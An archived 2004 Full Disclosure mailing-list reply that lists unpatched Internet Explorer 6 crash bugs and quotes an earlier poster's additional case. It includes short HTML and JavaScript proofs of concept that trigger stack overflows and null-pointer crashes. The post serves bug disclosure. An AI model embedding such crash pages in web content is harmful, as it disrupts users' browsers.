Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: IE bugs (Was: Web browsers - a mini-farce)
From: "Berend-Jan Wever" <skylined () edup tudelft nl>
Date: Wed, 20 Oct 2004 13:43:53 +0200

Here's some IE bugs out of my own collection that still aren't patched (IE6.0 W2K):

Stack overflows (_not_ buffer overflows):
<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
<HTML> <BODY onLoad="A"><IMG src="::" onError="this.src=this.src;"></BODY> </HTML>

Null pointer:
<HTML style="width:expression(navigate('?#'))">
  <HEAD> <META http-equiv="Page-Enter" content="blendTrans()"> </HEAD>
</HTML>

None of them pose a security-risk and they all require JavaScript. So now I actually forgot why I decided to mention 
them in a reply to this post. Well, maybe MS can fix them in the next SP now that they know about them...

Cheers,
SkyLined

----- Original Message ----- 
From: "Martin" <nakal () nurfuerspam de>
To: "Michal Zalewski" <lcamtuf () ghettot org>
Cc: "Full Disclosure" <full-disclosure () netsys com>
Sent: Wednesday, October 20, 2004 02:38
Subject: Re: [Full-disclosure] Web browsers - a mini-farce


Am Mo, den 18.10.2004 schrieb Michal Zalewski um 16:18:

  All browsers but Microsoft Internet Explorer kept crashing on a regular
  basis

Here, may I make your collection more complete?

This one is for IE6 on MS-Windows 2000:

<html><base href="ftp*://">
<body>
<iframe src="????"/>
</body>
</html>

Martin

PS: No, it's not been discovered by your tool. And I reported
    it already several years ago.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]